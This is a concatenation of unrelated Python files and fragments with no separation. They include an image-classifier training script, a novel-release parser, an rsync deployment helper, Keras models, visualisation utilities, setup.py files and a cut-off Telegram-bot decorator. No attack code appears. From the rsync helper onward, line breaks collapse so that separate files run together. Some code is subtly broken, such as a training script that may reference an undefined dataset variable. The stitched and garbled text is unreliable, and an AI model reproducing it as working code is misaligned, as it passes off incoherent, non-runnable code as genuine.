    train_loader, val_loader = None, None
    normalize = T.Normalize(
        mean=[0.485, 0.456, 0.406] if args.dataset.lower() == "imagenette" else [0.5071, 0.4866, 0.4409],
        std=[0.229, 0.224, 0.225] if args.dataset.lower() == "imagenette" else [0.2673, 0.2564, 0.2761]
    )

    if not args.test_only:
        st = time.time()
        if args.dataset.lower() == "imagenette":
            train_set = ImageFolder(
                os.path.join(args.data_path, 'train'),
                T.Compose([
                    T.RandomResizedCrop(args.img_size, scale=(0.3, 1.0)),
                    T.RandomHorizontalFlip(),
                    T.ColorJitter(brightness=0.3, contrast=0.3, saturation=0.1, hue=0.02),
                    T.ToTensor(), normalize,
                    T.RandomErasing(p=0.9, value='random')
                ]))
        else:
            cifar_version = CIFAR100 if args.dataset.lower() == "cifar100" else CIFAR10
            train_set = cifar_version(
                # assuming the dataset root is args.data_path (the original referenced an undefined data_dir)
                args.data_path, True,
                T.Compose([
                    T.RandomHorizontalFlip(),
                    T.ColorJitter(brightness=0.3, contrast=0.3, saturation=0.1, hue=0.02),
                    T.ToTensor(), normalize,
                    T.RandomErasing(p=0.9, value='random')
                ]))

        train_loader = torch.utils.data.DataLoader(
            train_set, batch_size=args.batch_size, drop_last=True,
            sampler=RandomSampler(train_set), num_workers=args.workers, pin_memory=True,
            worker_init_fn=worker_init_fn)

        print(f"Training set loaded in {time.time() - st:.2f}s "
              f"({len(train_set)} samples in {len(train_loader)} batches)")

    if not (args.lr_finder or args.check_setup):
        st = time.time()
        if args.dataset.lower() == "imagenette":
            eval_tf = []
            crop_pct = 0.875
            scale_size = min(int(math.floor(args.img_size / crop_pct)), 320)
            if scale_size < 320:
                eval_tf.append(T.Resize(scale_size))
            eval_tf.extend([T.CenterCrop(args.img_size), T.ToTensor(), normalize])
            val_set = ImageFolder(
                os.path.join(args.data_path, 'val'),
                T.Compose(eval_tf)
            )
        else:
            # same assumption as above for the dataset root
            val_set = CIFAR100(args.data_path, False, T.Compose([T.ToTensor(), normalize]))

        val_loader = torch.utils.data.DataLoader(
            val_set, batch_size=args.batch_size, drop_last=False,
            sampler=SequentialSampler(val_set), num_workers=args.workers, pin_memory=True,
            worker_init_fn=worker_init_fn)

        print(f"Validation set loaded in {time.time() - st:.2f}s ({len(val_set)} samples in {len(val_loader)} batches)")

    model = holocron.models.__dict__[args.model](args.pretrained, num_classes=len(train_set.classes))

    if args.loss == 'crossentropy':
        criterion = nn.CrossEntropyLoss()
    elif args.loss == 'label_smoothing':
        criterion = holocron.nn.LabelSmoothingCrossEntropy()

    # Create the contiguous parameters.
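    # Gather the trainable parameters (requires_grad=True); these are what gets handed to
    # whichever optimizer --opt selects below.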
    model_params = [p for p in model.parameters() if p.requires_grad]
    if args.opt == 'sgd':
        optimizer = torch.optim.SGD(model_params, args.lr, momentum=0.9, weight_decay=args.weight_decay)
    elif args.opt == 'adam':
        optimizer = torch.optim.Adam(model_params, args.lr, betas=(0.95, 0.99), eps=1e-6,
                                     weight_decay=args.weight_decay)
    elif args.opt == 'radam':
        optimizer = holocron.optim.RAdam(model_params, args.lr, betas=(0.95, 0.99), eps=1e-6,
                                         weight_decay=args.weight_decay)
    elif args.opt == 'ranger':
        # "ranger" wraps RAdam in a Lookahead optimizer wrapper (Lookahead is assumed to be
        # imported, e.g. from holocron.optim.wrapper; it is not declared in this snippet)
        optimizer = Lookahead(holocron.optim.RAdam(model_params, args.lr, betas=(0.95, 0.99), eps=1e-6,
                                                   weight_decay=args.weight_decay))
    elif args.opt == 'tadam':
        optimizer = holocron.optim.TAdam(model_params, args.lr, betas=(0.95, 0.99), eps=1e-6,
                                         weight_decay=args.weight_decay)

    trainer = ClassificationTrainer(model, train_loader, val_loader, criterion, optimizer,
                                    args.device, args.output_file)
    if args.resume:
        print(f"Resuming {args.resume}")
        checkpoint = torch.load(args.resume, map_location='cpu')
        trainer.load(checkpoint)

    if args.test_only:
        print("Running evaluation")
        eval_metrics = trainer.evaluate()
        print(f"Validation loss: {eval_metrics['val_loss']:.4} "
              f"(Acc@1: {eval_metrics['acc1']:.2%}, Acc@5: {eval_metrics['acc5']:.2%})")
        return

    if args.lr_finder:
        print("Looking for optimal LR")
        trainer.lr_find(args.freeze_until, num_it=min(len(train_loader), 100))
        trainer.plot_recorder()
        return

    if args.check_setup:
        print("Checking batch overfitting")
        is_ok = trainer.check_setup(args.freeze_until, args.lr, num_it=min(len(train_loader), 100))
        print(is_ok)
        return

    print("Start training")
    start_time = time.time()
    trainer.fit_n_epochs(args.epochs, args.lr, args.freeze_until, args.sched)
    total_time_str = str(datetime.timedelta(seconds=int(time.time() - start_time)))
    print(f"Training time {total_time_str}")


def parse_args():
    import argparse
    parser = argparse.ArgumentParser(description='Holocron Classification Training',
                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('data_path', type=str, help='path to dataset folder')
    parser.add_argument('--model', default='darknet19', type=str, help='model')
    parser.add_argument('--dataset', default='imagenette', type=str, help='dataset to train on')
    parser.add_argument('--freeze-until', default=None, type=str, help='Last layer to freeze')
    parser.add_argument('--device', default=None, type=int, help='device')
    parser.add_argument('-b', '--batch-size', default=32, type=int, help='batch size')
    parser.add_argument('--epochs', default=20, type=int, help='number of total epochs to run')
    parser.add_argument('-j', '--workers', default=min(os.cpu_count(), 16), type=int,
                        help='number of data loading workers')
    parser.add_argument('--img-size', default=224, type=int, help='image size')
    parser.add_argument('--loss', default='crossentropy', type=str, help='loss')
    parser.add_argument('--opt', default='adam', type=str, help='optimizer')
    parser.add_argument('--sched', default='onecycle', type=str, help='Scheduler to be used')
    parser.add_argument('--lr', default=1e-3, type=float, help='initial learning rate')
    parser.add_argument('--wd', '--weight-decay', default=0, type=float, help='weight decay', dest='weight_decay')
    parser.add_argument("--lr-finder", dest='lr_finder', action='store_true', help="Should you run LR Finder")
    parser.add_argument("--check-setup", dest='check_setup', action='store_true', help="Check your training setup")
    parser.add_argument('--output-file', default='./model.pth', help='path where to save')
    parser.add_argument('--resume', default='', help='resume from checkpoint')
    parser.add_argument("--test-only", dest="test_only", help="Only test the model", action="store_true")
    parser.add_argument("--pretrained", dest="pretrained", help="Use pre-trained models from the modelzoo",
                        action="store_true")

    args = parser.parse_args()
    return args


if __name__ == "__main__":
    args = parse_args()
    main(args)


def extractHugsAndLove(item):
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol or frag) or 'preview' in item['title'].lower():
        return None
    if not postfix and ':' in item['title']:
        postfix = item['title'].split(':', 1)[-1]
    if 'Felicia Second Life' in item['tags']:
        return buildReleaseMessageWithType(item, 'Felicia Second Life', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
    if 'the rock' in item['tags']:
        return buildReleaseMessageWithType(item, 'The Rock', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
    if item['title'].startswith('Armageddon'):
        return buildReleaseMessageWithType(item, 'Armageddon', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
    return False


# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import logging
import os
import sh

from dlrn.config import getConfigOptions

logger = logging.getLogger("dlrn-rsync")


def sync_repo(commit):
    config_options = getConfigOptions()
    rsyncdest = config_options.rsyncdest
    rsyncport = config_options.rsyncport
    datadir = os.path.realpath(config_options.datadir)

    if rsyncdest != '':
        # We are only rsyncing the current repo dir to rsyncdest
        rsyncpaths = []
        # We are inserting a dot in the path after repos, this is used by
        # rsync -R (see man rsync)
        commitdir_abs = os.path.join(datadir, "repos", ".",
                                     commit.getshardedcommitdir())
        rsyncpaths.append(commitdir_abs)
        # We also need report.html, status_report.html, queue.html,
        # styles.css and the consistent and current symlinks
        for filename in ['report.html', 'status_report.html', 'styles.css',
                         'queue.html', 'status_report.csv']:
            filepath = os.path.join(datadir, "repos", ".", filename)
            rsyncpaths.append(filepath)

        rsh_command = 'ssh -p %s -o StrictHostKeyChecking=no' % rsyncport
        try:
            sh.rsync('-avzR', '--delete-delay', '-e', rsh_command,
                     rsyncpaths, rsyncdest)
        except Exception as e:
            logger.warn('Failed to rsync content to %s ,'
                        'got error %s' % (rsyncdest, e))
            # Raise exception, so it can be treated as an error
            raise e


def sync_symlinks(commit):
    config_options = getConfigOptions()
    rsyncdest = config_options.rsyncdest
    rsyncport = config_options.rsyncport
    datadir = os.path.realpath(config_options.datadir)

    if rsyncdest != '':
        # We want to sync the symlinks in a second pass, once all content
        # has been copied, to avoid a race condition if they are copied first
        rsyncpaths = []
        for filename in ['consistent', 'current']:
            filepath = os.path.join(datadir, "repos", ".", filename)
            rsyncpaths.append(filepath)

        rsh_command = 'ssh -p %s -o StrictHostKeyChecking=no' % rsyncport
        try:
            sh.rsync('-avzR', '--delete-delay', '-e', rsh_command,
                     rsyncpaths, rsyncdest)
        except Exception as e:
            # We are not raising exceptions for symlink rsyncs, these will
            # be fixed
after another build logger.warn('Failed to rsync symlinks to %s ,' 'got error %s' % (rsyncdest, e)) n=1 suma=0 while (n<61): if (n==n): n=n+5 suma=suma+n print(n) print("n12="+str(n)) print("suma="+str(suma))""" Value is not in collection conditions """ from marshmallow import post_load from .base import CollectionCondition, CollectionConditionSchema class IsNotIn(CollectionCondition): """ Condition for `what` is not a member of `values` """ def is_satisfied(self, ctx) -> bool: return self._is_satisfied(ctx.attribute_value) def _is_satisfied(self, what) -> bool: return what not in self.values class IsNotInSchema(CollectionConditionSchema): """ JSON schema for is not in collection condition """ @post_load def post_load(self, data, **_): # pylint: disable=missing-docstring,no-self-use return IsNotIn(**data) 0 from keras.models import Sequential from keras.layers import Conv2D, MaxPooling2D, Dropout, Flatten, Dense, BatchNormalization def model2(input_shape): model = Sequential() model.add(Conv2D(32,kernel_size=3,activation='relu',input_shape=input_shape)) model.add(BatchNormalization()) model.add(Conv2D(32,kernel_size=3,activation='relu')) model.add(BatchNormalization()) model.add(Conv2D(32,kernel_size=5,strides=2,padding='same',activation='relu')) model.add(BatchNormalization()) model.add(Dropout(0.4)) model.add(Conv2D(64,kernel_size=3,activation='relu')) model.add(BatchNormalization()) model.add(Conv2D(64,kernel_size=3,activation='relu')) model.add(BatchNormalization()) model.add(Conv2D(64,kernel_size=5,strides=2,padding='same',activation='relu')) model.add(BatchNormalization()) model.add(Dropout(0.4)) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(BatchNormalization()) model.add(Dropout(0.4)) model.add(Dense(10, activation='softmax')) return model # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ # MIT License # # Copyright (c) 2021 # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
# ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ import logging import numpy as np import torch from disent.util import to_numpy from disent.visualize import visualize_util from disent.visualize.visualize_util import make_animated_image_grid from disent.visualize.visualize_util import reconstructions_to_images log = logging.getLogger(__name__) # ========================================================================= # # Visualise Latent Cycle - Modes # # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ # # Copyright 2018 The DisentanglementLib Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 # # https://github.com/google-research/disentanglement_lib # # Copyright applies to this subsection only. # # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ # # CHANGES: # # - extracted from original code # # - was not split into functions in this was # # ========================================================================= # def _z_std_gaussian_cycle(base_z, z_means, z_logvars, z_idx, num_frames): # Cycle through quantiles of a standard Gaussian. zs = np.repeat(np.expand_dims(base_z, 0), num_frames, axis=0) zs[:, z_idx] = visualize_util.cycle_gaussian(base_z[z_idx], num_frames, loc=0, scale=1) return zs def _z_fitted_gaussian_cycle(base_z, z_means, z_logvars, z_idx, num_frames): # Cycle through quantiles of a fitted Gaussian. zs = np.repeat(np.expand_dims(base_z, 0), num_frames, axis=0) loc = np.mean(z_means[:, z_idx]) total_variance = np.mean(np.exp(z_logvars[:, z_idx])) + np.var(z_means[:, z_idx]) zs[:, z_idx] = visualize_util.cycle_gaussian(base_z[z_idx], num_frames, loc=loc, scale=np.sqrt(total_variance)) return zs def _z_fixed_interval_cycle(base_z, z_means, z_logvars, z_idx, num_frames): # Cycle through [-2, 2] interval. zs = np.repeat(np.expand_dims(base_z, 0), num_frames, axis=0) zs[:, z_idx] = visualize_util.cycle_interval(base_z[z_idx], num_frames, -2., 2.) return zs def _z_conf_interval_cycle(base_z, z_means, z_logvars, z_idx, num_frames): # Cycle linearly through +-2 std dev of a fitted Gaussian. zs = np.repeat(np.expand_dims(base_z, 0), num_frames, axis=0) loc = np.mean(z_means[:, z_idx]) total_variance = np.mean(np.exp(z_logvars[:, z_idx])) + np.var(z_means[:, z_idx]) scale = np.sqrt(total_variance) zs[:, z_idx] = visualize_util.cycle_interval(base_z[z_idx], num_frames, loc - 2. * scale, loc + 2. * scale) return zs def _z_minmax_interval_cycle(base_z, z_means, z_logvars, z_idx, num_frames): # Cycle linearly through minmax of a fitted Gaussian. 
zs = np.repeat(np.expand_dims(base_z, 0), num_frames, axis=0) zs[:, z_idx] = visualize_util.cycle_interval(base_z[z_idx], num_frames, np.min(z_means[:, z_idx]), np.max(z_means[:, z_idx])) return zs _LATENT_CYCLE_MODES_MAP = { 'std_gaussian_cycle': _z_std_gaussian_cycle, 'fitted_gaussian_cycle': _z_fitted_gaussian_cycle, 'fixed_interval_cycle': _z_fixed_interval_cycle, 'conf_interval_cycle': _z_conf_interval_cycle, 'minmax_interval_cycle': _z_minmax_interval_cycle, } # ========================================================================= # # Visualise Latent Cycles # # ========================================================================= # def latent_cycle(decoder_func, z_means, z_logvars, mode='fixed_interval_cycle', num_animations=4, num_frames=20, decoder_device=None): assert len(z_means) > 1 and len(z_logvars) > 1, 'not enough samples to average' # convert z_means, z_logvars = to_numpy(z_means), to_numpy(z_logvars) # get mode if mode not in _LATENT_CYCLE_MODES_MAP: raise KeyError(f'Unsupported mode: {repr(mode)} not in {set(_LATENT_CYCLE_MODES_MAP)}') z_gen_func = _LATENT_CYCLE_MODES_MAP[mode] animations = [] for i, base_z in enumerate(z_means[:num_animations]): frames = [] for j in range(z_means.shape[1]): z = z_gen_func(base_z, z_means, z_logvars, j, num_frames) z = torch.as_tensor(z, device=decoder_device) frames.append(reconstructions_to_images(decoder_func(z))) animations.append(frames) return to_numpy(animations) def latent_cycle_grid_animation(decoder_func, z_means, z_logvars, mode='fixed_interval_cycle', num_frames=21, pad=4, border=True, bg_color=0.5, decoder_device=None, tensor_style_channels=True, always_rgb=True, return_stills=False, to_uint8=False): # produce latent cycle animation & merge frames stills = latent_cycle(decoder_func, z_means, z_logvars, mode=mode, num_animations=1, num_frames=num_frames, decoder_device=decoder_device)[0] # check and add missing channel if needed (convert greyscale to rgb images) if always_rgb: assert stills.shape[-1] in {1, 3}, f'Invalid number of image channels: {stills.shape} ({stills.shape[-1]})' if stills.shape[-1] == 1: stills = np.repeat(stills, 3, axis=-1) # create animation frames = make_animated_image_grid(stills, pad=pad, border=border, bg_color=bg_color) # move channels to end if tensor_style_channels: if return_stills: stills = np.transpose(stills, [0, 1, 4, 2, 3]) frames = np.transpose(frames, [0, 3, 1, 2]) # convert to uint8 if to_uint8: if return_stills: stills = np.clip(stills*255, 0, 255).astype('uint8') frames = np.clip(frames*255, 0, 255).astype('uint8') # done! if return_stills: return frames, stills return frames # ========================================================================= # # END # # ========================================================================= # 0 #rename file to config.py token = "YOUR TOKEN HERE"from customs.strategies.base_strategy import BaseStrategy def concreter(abclass): """ >>> import abc >>> class Abstract(metaclass=abc.ABCMeta): ... @abc.abstractmethod ... def bar(self): ... 
return None >>> c = concreter(Abstract) >>> c.__name__ 'dummy_concrete_Abstract' >>> c().bar() # doctest: +ELLIPSIS (, (), {}) """ if "__abstractmethods__" not in abclass.__dict__: return abclass new_dict = abclass.__dict__.copy() for abstractmethod in abclass.__abstractmethods__: # replace each abc method or property with an identity function: new_dict[abstractmethod] = lambda x, *args, **kw: (x, args, kw) # creates a new class, with the overriden ABCs: return type("dummy_concrete_%s" % abclass.__name__, (abclass,), new_dict) def test_base_strategy(): concreter(BaseStrategy) # This problem was asked by . # cons(a, b) constructs a pair, and car(pair) and cdr(pair) returns the first and # last element of that pair. For example, car(cons(3, 4)) returns 3, and # cdr(cons(3, 4)) returns 4. # Given this implementation of cons: # def cons(a, b): # return lambda f : f(a, b) # Implement car and cdr. #### def cons(a, b): return lambda f : f(a, b) #### def car(f): return f(lambda x, y: x) def cdr(f): return f(lambda x, y: y) #### tmp = cons(1, 2) a = cons(3, tmp) print(car(a)) print(car(cdr(a))) print(cdr(cdr(a))) paperai/report/__main__.py0 """ Defines main entry point for Report process. """ import sys from .execute import Execute if __name__ == "__main__": if len(sys.argv) > 1: # Run report with params: input file, topn, render # format, embeddings model path, qa model path, threshold Execute.run( sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else None, sys.argv[3] if len(sys.argv) > 3 else None, sys.argv[4] if len(sys.argv) > 4 else None, sys.argv[5] if len(sys.argv) > 5 else None, sys.argv[6] if len(sys.argv) > 6 else None, int(sys.argv[7]) if len(sys.argv) > 7 else None, ) """ setup.py file for building armstrong components. Nothing in this file should need to be edited, please see accompanying package.json file if you need to adjust metadata about this package. """ from distutils.core import setup import json import os info = json.load(open("./package.json")) def convert_to_str(d): """ Recursively convert all values in a dictionary to strings This is required because setup() does not like unicode in the values it is supplied. """ d2 = {} for k, v in d.items(): k = str(k) if type(v) in [list, tuple]: d2[k] = [str(a) for a in v] elif type(v) is dict: d2[k] = convert_to_str(v) else: d2[k] = str(v) return d2 info = convert_to_str(info) NAMESPACE_PACKAGES = [] # TODO: simplify this process def generate_namespaces(package): new_package = ".".join(package.split(".")[0:-1]) if new_package.count(".") > 0: generate_namespaces(new_package) NAMESPACE_PACKAGES.append(new_package) generate_namespaces(info["name"]) if os.path.exists("MANIFEST"): os.unlink("MANIFEST") # Borrowed and modified from django-registration # Compile the list of packages available, because distutils doesn't have # an easy way to do this. packages, data_files = [], [] root_dir = os.path.dirname(__file__) if root_dir: os.chdir(root_dir) def build_package(dirpath, dirnames, filenames): # Ignore dirnames that start with '.' 
for i, dirname in enumerate(dirnames): if dirname.startswith('.'): del dirnames[i] if '__init__.py' in filenames and 'steps.py' not in filenames: pkg = dirpath.replace(os.path.sep, '.') if os.path.altsep: pkg = pkg.replace(os.path.altsep, '.') packages.append(pkg) elif filenames: # Strip off the length of the package name plus the trailing slash prefix = dirpath[len(info["name"]) + 1:] for f in filenames: # Ignore all dot files and any compiled if f.startswith(".") or f.endswith(".pyc"): continue data_files.append(os.path.join(prefix, f)) [build_package(dirpath, dirnames, filenames) for dirpath, dirnames, filenames in os.walk(info["name"].replace(".", "/"))] setup_kwargs = { "author": "Bay Citizen & Texas Tribune", "author_email": "", "url": "http://github.com/armstrong/%s/" % info["name"], "packages": packages, "package_data": {info["name"]: data_files, }, "namespace_packages": NAMESPACE_PACKAGES, "classifiers": [ 'Development Status :: 5 - Production/Stable', 'Environment :: Web Environment', 'Framework :: Django', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming Language :: Python', ], } setup_kwargs.update(info) setup(**setup_kwargs) #!/usr/bin/env python from distutils.core import setup setup( name='progeny', version='1.0', description='PROGENy is a python package to compute pathway activity from RNA-seq data', author='', url='https://github.com/saezlab/progeny-py', packages=['progeny'], license='LICENSE.txt', package_data={'progeny': ['data/model_human_full.pkl', 'data/model_mouse_full.pkl']}, install_requires=[ 'anndata', 'scanpy', 'numpy'] )from __future__ import annotations from typing import List, Dict, Any from ecstremity.entity import Entity from ecstremity.prefab_component import PrefabComponent class Prefab: def __init__( self, name: str, inherit: List[Prefab] = None, components: List[PrefabComponent] = None ) -> None: self.name = name self.inherit = inherit if inherit else [] self.components = components if components else [] def __str__(self): return f"{self.name} {[component.cls for component in self.components]}" def add_component(self, component: PrefabComponent): self.components.append(component) def apply_to_entity(self, entity: Entity, prefab_props: Dict[int, Any] = None) -> Entity: if not prefab_props: prefab_props = {} prefab_props = {k.upper(): v for k, v in prefab_props.items()} for parent in self.inherit: parent.apply_to_entity(entity, prefab_props) arr_comps = {} for component in self.components: klass = component.klass comp_id = klass.comp_id initial_comp_props = {} if klass.allow_multiple: if not arr_comps.get(comp_id): arr_comps[comp_id] = 0 if prefab_props.get(comp_id): if prefab_props[comp_id].get(arr_comps[comp_id]): initial_comp_props = prefab_props[comp_id][arr_comps[comp_id]] arr_comps[comp_id] += 1 else: initial_comp_props = prefab_props.get(comp_id) component.apply_to_entity(entity, initial_comp_props) return entity # next is to add accel and see the difference # add stiffness too import numpy as np from scipy import signal, stats from matplotlib import pyplot as plt from all_functions import * import pickle from warnings import simplefilter simplefilter(action='ignore', category=FutureWarning) experiment_ID = "transfer_learning_6" errors_all_A_A = np.load("./results/{}/errors_all_A_A.npy".format(experiment_ID)) errors_all_A_B = np.load("./results/{}/errors_all_A_B.npy".format(experiment_ID)) errors_all_B_B = 
np.load("./results/{}/errors_all_B_B.npy".format(experiment_ID)) ## printing the results print("errors_mean: ",errors_all_A_A.mean(2)) print("errors_std: ",errors_all_A_A.std(2)) print("errors_mean: ",errors_all_A_B.mean(2)) print("errors_std: ",errors_all_A_B.std(2)) print("errors_mean: ",errors_all_B_B.mean(2)) print("errors_std: ",errors_all_B_B.std(2)) [f_ow, p_val_avg] = stats.f_oneway(errors_all_A_A.mean(0)[0],errors_all_A_B.mean(0)[0]) print("p-value (babbling/average/A_A vs A_B): ", p_val_avg) [f_ow, p_val_avg] = stats.f_oneway(errors_all_A_A.mean(0)[1],errors_all_A_B.mean(0)[1]) print("p-value (refined/average/A_A vs A_B): ", p_val_avg) [f_ow, p_val_avg] = stats.f_oneway(errors_all_A_A.mean(0)[1],errors_all_B_B.mean(0)[1]) print("p-value (refined/average/A_A vs B_B): ", p_val_avg) # [f_ow, p_val_q0] = stats.f_oneway(errors_all_A_A[0,:],errors_all_A_B[0,:]) # print("p-value (q0): ", p_val_q0) # [f_ow, p_val_q1] = stats.f_oneway(errors_all_A_A[1,:],errors_all_A_B[1,:]) # print("p-value (q1): ", p_val_q1) y_lim=[0, 0.9] fig, axes = plt.subplots(nrows=2, ncols=3, figsize=(12, 5)) p0 = axes[0][0].boxplot( [errors_all_A_A.mean(0)[0], errors_all_A_B.mean(0)[0], errors_all_B_B.mean(0)[0]], notch=True, patch_artist=True) axes[0][0].set_title(r'$(q_0+q_1)/2$',fontsize=12) axes[0][0].set_ylim(y_lim) #axes[0].set_xlabel('stiffness') axes[0][0].set_xticklabels(["A_A", "A_B", "B_B"], rotation=45, fontsize=8) axes[0][0].set_ylabel('RMSE') p1 = axes[0][1].boxplot( [errors_all_A_A[0,0,:], errors_all_A_B[0,0,:], errors_all_B_B[0,0,:]], notch=True, patch_artist=True) axes[0][1].set_title('$q_0$', fontsize=12) axes[0][1].set_ylim(y_lim) axes[0][1].set_yticklabels([]) #axes[1].set_xlabel('stiffness') axes[0][1].set_xticklabels(["A_A", "A_B", "B_B"], rotation=45, fontsize=8) p2 = axes[0][2].boxplot( [errors_all_A_A[1,0,:], errors_all_A_B[1,0,:], errors_all_B_B[1,0,:]], notch=True, patch_artist=True) axes[0][2].set_title('$q_1$', fontsize=12) axes[0][2].set_ylim(y_lim) axes[0][2].set_yticklabels([]) #axes[2].set_xlabel('stiffness') axes[0][2].set_xticklabels(["A_A", "A_B", "B_B"], rotation=45, fontsize=8) p3 = axes[1][0].boxplot( [errors_all_A_A.mean(0)[-1], errors_all_A_B.mean(0)[-1], errors_all_B_B.mean(0)[-1]], notch=True, patch_artist=True) #axes[1][0].set_title(r'$(q_0+q_1)/2$',fontsize=12) axes[1][0].set_ylim(y_lim) #axes[0].set_xlabel('stiffness') axes[1][0].set_xticklabels(["A_A", "A_B", "B_B"], rotation=45, fontsize=8) axes[1][0].set_ylabel('RMSE') p4 = axes[1][1].boxplot( [errors_all_A_A[0,-1,:], errors_all_A_B[0,-1,:], errors_all_B_B[0,-1,:]], notch=True, patch_artist=True) #axes[1][1].set_title('$q_0$', fontsize=12) axes[1][1].set_ylim(y_lim) axes[1][1].set_yticklabels([]) #axes[1].set_xlabel('stiffness') axes[1][1].set_xticklabels(["A_A","A_B", "B_B"], rotation=45, fontsize=8) p5 = axes[1][2].boxplot( [errors_all_A_A[1,-1,:], errors_all_A_B[1,-1,:], errors_all_B_B[1,-1,:]], notch=True, patch_artist=True) #axes[1][2].set_title('$q_1$', fontsize=12) axes[1][2].set_ylim(y_lim) axes[1][2].set_yticklabels([]) #axes[2].set_xlabel('stiffness') axes[1][2].set_xticklabels(["A_A","A_B","B_B"], rotation=45, fontsize=8) for i_row in range(2): for j_col in range(3): axes[i_row][j_col].grid(True) plt.show() #import pdb; pdb.set_trace() WyckliffeAluga/data-chronicles # -*- coding: utf-8 -*- """ Created on Sat May 9 19:52:11 2020 @author: wyckliffe """ from sklearn.preprocessing import MinMaxScaler from keras.models import load_model import numpy as np def predict(Gender, Age, Salary, Debt, Net): if Gender 
== "M" or Gender == "m" : Gender = 1 else: Gender = 0 inputs = np.asarray([Gender, Age, Salary, Debt, Net]).reshape(-1,1) scaler = MinMaxScaler() inputs = scaler.fit_transform(inputs) inputs = inputs.T model = load_model("model.h5") predictions = model.predict(inputs) prediction = scaler.inverse_transform(predictions) amount = prediction[0][0] return '${:,.2f}'.format(amount) # pylint: disable=missing-module-docstring # # Copyright (C) 2020 by UsergeTeam@Github, < https://github.com/UsergeTeam >. # # This file is part of < https://github.com/UsergeTeam/Userge > project, # and is released under the "GNU v3.0 License Agreement". # Please see < https://github.com/uaudith/Userge/blob/master/LICENSE > # # All rights reserved. __all__ = ['OnFilters'] from pyrogram.filters import Filter as RawFilter from ... import types from . import RawDecorator class OnFilters(RawDecorator): # pylint: disable=missing-class-docstring def on_filters(self, # pylint: disable=arguments-differ filters: RawFilter, group: int = 0, allow_private: bool = True, allow_bots: bool = True, allow_groups: bool = True, allow_channels: bool = True, only_admins: bool = False, allow_via_bot: bool = True, check_client: bool = True, check_downpath: bool = False, check_change_info_perm: bool = False, check_edit_perm: bool = False, check_delete_perm: bool = False, check_restrict_perm: bool = False, check_promote_perm: bool = False, check_invite_perm: bool = False, check_pin_perm: bool = False) -> RawDecorator._PYRORETTYPE: """\nDecorator for handling filters Parameters: filters (:obj:`~pyrogram.filters`): Pass one or more filters to allow only a subset of messages to be passed in your function. group (``int``, *optional*): The group identifier, defaults to 0. allow_private (``bool``, *optional*): If ``False``, prohibit private chats, defaults to True. allow_bots (``bool``, *optional*): If ``False``, prohibit bot chats, defaults to True. allow_groups (``bool``, *optional*): If ``False``, prohibit group chats, defaults to True. allow_channels (``bool``, *optional*): If ``False``, prohibit channel chats, defaults to True. only_admins (``bool``, *optional*): If ``True``, client should be an admin, defaults to False. allow_via_bot (``bool``, *optional*): If ``True``, allow this via your bot, defaults to True. check_client (``bool``, *optional*): If ``True``, check client is bot or not before execute, defaults to True. check_downpath (``bool``, *optional*): If ``True``, check downpath and make if not exist, defaults to False. check_change_info_perm (``bool``, *optional*): If ``True``, check user has change_info permission before execute, defaults to False. check_edit_perm (``bool``, *optional*): If ``True``, check user has edit permission before execute, defaults to False. check_delete_perm (``bool``, *optional*): If ``True``, check user has delete permission before execute, defaults to False. check_restrict_perm (``bool``, *optional*): If ``True``, check user has restrict permission before execute, defaults to False. check_promote_perm (``bool``, *optional*): If ``True``, check user has promote permission before execute, defaults to False. check_invite_perm (``bool``, *optional*): If ``True``, check user has invite permission before execute, defaults to False. check_pin_perm (``bool``, *optional*): If ``True``, check user has pin permission before execute, defaults to False. 
